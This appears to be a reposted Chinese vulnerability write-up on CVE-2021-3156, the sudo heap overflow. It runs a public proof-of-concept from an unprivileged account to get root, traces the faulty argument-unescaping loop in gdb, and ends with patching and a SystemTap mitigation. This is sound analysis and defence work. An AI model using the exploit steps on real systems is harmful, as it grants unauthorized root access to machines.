文章来源: 天禧信安
useradd doge
su dogewhoami# dogesudo apt install git# doge不在sudoers文件中。此事件将被报告
git clone https://github.com/blasty/CVE-2021-3156.gitcd CVE-2021-3156make
./sudo-hax-me-a-sandwich#** CVE-2021-3156 PoC by blasty## usage: ./sudo-hax-me-a-sandwich## available targets:# ------------------------------------------------------------# 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27# 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31# 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28# ------------------------------------------------------------## manual mode:# ./sudo-hax-me-a-sandwich
./sudo-hax-me-a-sandwich 0# ** CVE-2021-3156 PoC by blasty## using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'](56, 54, 63, 212)# ** pray for your rootshell.. **# [+] bl1ng bl1ng! We got it!whoami# root
sudo apt install cgdb
wget https://github.com/sudo-project/sudo/archive/SUDO_1_9_5p1.tar.gztar xf SUDO_1_9_5p1.tar.gzcd sudo-SUDO_1_9_5p1mkdir buildcd build../configure --enable-env-debugmake -jsudo make install
sudo cgdb --args sudoedit -s '\' 1145141919810# 一定要以root权限调试!
(gdb) b ../../../plugins/sudoers/sudoers.c:964No source file named ../../../plugins/sudoers/sudoers.c.Make breakpoint pending on future shared library load? (y or [n]) yBreakpoint 1 (../../../plugins/sudoers/sudoers.c:964) pending.(gdb) #注意,我现在位置一直是在build文件夹没变,这种相对路径要注意当前位置
/* set user_args */if (NewArgc > 1) {char *to, *from, **av;size_t size, n;/* Alloc and build up user_args. */for (size = 0, av = NewArgv + 1; *av; av++)size += strlen(*av) + 1;if (size == 0 || (user_args = malloc(size)) == NULL) {sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));debug_return_int(NOT_FOUND_ERROR);}if (ISSET(sudo_mode, MODE_SHELL|MODE_LOGIN_SHELL)) { //**gdb断在此处**/** When running a command via a shell, the sudo front-end* escapes potential meta chars. We unescape non-spaces* for sudoers matching and logging purposes.*/for (to = user_args, av = NewArgv + 1; (from = *av); av++) {while (*from) {if (from[0] == '\\' && !isspace((unsigned char)from[1]))from++;*to++ = *from++;}*to++ = ' ';}*--to = '\0';}
/* Alloc and build up user_args. */for (size = 0, av = NewArgv + 1; *av; av++)size += strlen(*av) + 1;if (size == 0 || (user_args = malloc(size)) == NULL) {sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));debug_return_int(NOT_FOUND_ERROR);}
(gdb) p size$1 = 16
(gdb) p NewArgv$2 = (char **) 0x55c42f87f708
(gdb) p NewArgv+25$3 = (char **) 0x55c42f87f7d0
(gdb) x/8xg 0x55c42f87f7d00x55c42f87f7d0: 0x00007f041be3fca0 0x00007f041be3fca00x55c42f87f7e0: 0x0000000000000000 0x0000000000000c210x55c42f87f7f0: 0x00007f041be3fca0 0x00007f041be3fca00x55c42f87f800: 0x0000000000000000 0x0000000000000000
user_argsfor (to = user_args, av = NewArgv + 1; (from = *av); av++) {while (*from) {//注意if判断if (from[0] == '\\' && !isspace((unsigned char)from[1]))from++;*to++ = *from++;}*to++ = ' ';}
if (from[0] == '\\' && !isspace((unsigned char)from[1]))from++;
(gdb) p NewArgv[1]$4 = 0x7ffec3f74315 "\\"(gdb) x/20xb 0x7ffec3f743150x7ffec3f74315: 0x5c 0x00 0x31 0x31 0x34 0x35 0x31 0x340x7ffec3f7431d: 0x31 0x39 0x31 0x39 0x38 0x31 0x30 0x000x7ffec3f74325: 0x43 0x4c 0x55 0x54
(gdb) p size$1 = 16
(gdb) b ../../../plugins/sudoers/sudoers.c:978Breakpoint 2 at 0x7ff42c055f01: file ../../../plugins/sudoers/sudoers.c, line 978.(gdb) cContinuing.Breakpoint 2, set_cmnd () at ../../../plugins/sudoers/sudoers.c:978
(gdb) p to$5 = 0x5572bbba57ec " "(gdb) p 0x5572bbba57ec-0x5572bbba57d0$6 = 28(gdb) #我虚拟机中途重启过一次,因此内存(gdb) #地址有变动。在系统未重启的情况下(gdb) #0x5572bbba57d0这个地址应为上面(gdb) #计算出的user_args的地址(gdb) #(即0x55c42f87f7d0)
(gdb) x/8xg 0x5572bbba57d00x5572bbba57d0: 0x3134313534313100 0x31203031383931390x5572bbba57e0: 0x3139313431353431 0x00000020303138390x5572bbba57f0: 0x00007ff42daabca0 0x00007ff42daabca00x5572bbba5800: 0x0000000000000000 0x0000000000000000
sudo apt updatesudo apt upgrade #或sudo apt install sudo
yum install systemtap yum-utils kernel-devel-"$(uname -r)"vim sudoedit.stap# 写入以下内容:# probe process("/usr/bin/sudo").function("main") {# command = cmdline_args(0,0,"");# if (strpos(command, "edit") >= 0) {# raise(9);# }# }nohup stap -g sudoedit.stap &# 注意,上述措施会在重启后失效# 如果安装了补丁程序,可以用以下办法撤销临时措施:kill -s SIGTERM systemtap进程PID
推荐文章++++
*CVE-2020-28243 SaltStack Minion本地特权提升漏洞分析
文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650506838&idx=3&sn=7b5d6f14661937e1c2ee3cb93de5ba82&chksm=83bae3b2b4cd6aa4f288986e039c1a3f8791df1077c294e817a2f09bbb0eb12d4105f58b0bec#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh